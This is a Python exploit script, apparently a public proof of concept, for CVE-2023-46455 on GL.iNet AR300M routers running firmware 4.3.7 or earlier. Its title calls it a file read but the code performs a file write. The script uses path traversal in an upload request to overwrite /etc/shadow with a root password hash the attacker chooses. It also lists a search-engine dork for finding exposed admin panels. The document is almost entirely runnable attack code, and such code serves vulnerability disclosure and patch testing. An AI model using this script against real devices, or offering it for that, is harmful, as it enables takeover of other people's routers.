GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455

1. #!/usr/bin/env python3
2.  
3. # Exploit Title: GL.iNet <= 4.3.7 Arbitrary File Write
4. # Google Dork: intitle:"GL.iNet Admin Panel"
5. # Date: XX/11/2023
6. # Exploit Author: Michele 'cyberaz0r' Di Bonaventura
7. # Vendor Homepage: https://www.gli-net.com
8. # Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
9. # Version: 4.3.7
10. # Tested on: GL.iNet AR300M
11. # CVE: CVE-2023-46455
12.  
13. import crypt
14. import requests
15. from sys import argv
16.  
17. requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
18.  
19. def craft_shadow_file(salted_password):
20.     shadow_content  = 'root:{}:19459:0:99999:7:::\n'.format(salted_password)
21.     shadow_content += 'daemon:*:0:0:99999:7:::\n'
22.     shadow_content += 'ftp:*:0:0:99999:7:::\n'
23.     shadow_content += 'network:*:0:0:99999:7:::\n'
24.     shadow_content += 'nobody:*:0:0:99999:7:::\n'
25.     shadow_content += 'dnsmasq:x:0:0:99999:7:::\n'
26.     shadow_content += 'stubby:x:0:0:99999:7:::\n'
27.     shadow_content += 'ntp:x:0:0:99999:7::\n'
28.     shadow_content += 'mosquitto:x:0:0:99999:7::\n'
29.     shadow_content += 'logd:x:0:0:99999:7::\n'
30.     shadow_content += 'ubus:x:0:0:99999:7::\n'
31.     return shadow_content
32.  
33. def replace_shadow_file(url, auth_token, shadow_content):
34.     data = {
35.         'sid': (None, auth_token),
36.         'size': (None, '4'),
37.         'path': (None, '/tmp/ovpn_upload/../../etc/shadow'),
38.         'file': ('shadow', shadow_content)
39.     }
40.     requests.post(url, files=data, verify=False)
41.  
42. def main(base_url, auth_token):
43.     print('[+] Started GL.iNet <= 4.3.7 Arbitrary File Write exploit')
44.  
45.     password = input('[?] New password for root user: ')
46.     salted_password = crypt.crypt(password, salt=crypt.METHOD_MD5)
47.  
48.     shadow_content = craft_shadow_file(salted_password)
49.     print('[+] Crafted shadow file:\n{}'.format(shadow_content))
50.  
51.     print('[*] Replacing shadow file with the crafted one')
52.     replace_shadow_file(base_url+'/upload', auth_token, shadow_content)
53.  
54.     print('[+] Done')
55.  
56. if __name__ == '__main__':
57.     if len(argv) < 3:
58.         print('Usage: {} <TARGET_URL> <AUTH_TOKEN>'.format(argv[0]))
59.         exit(1)
60.  
61.     main(argv[1], argv[2])
62.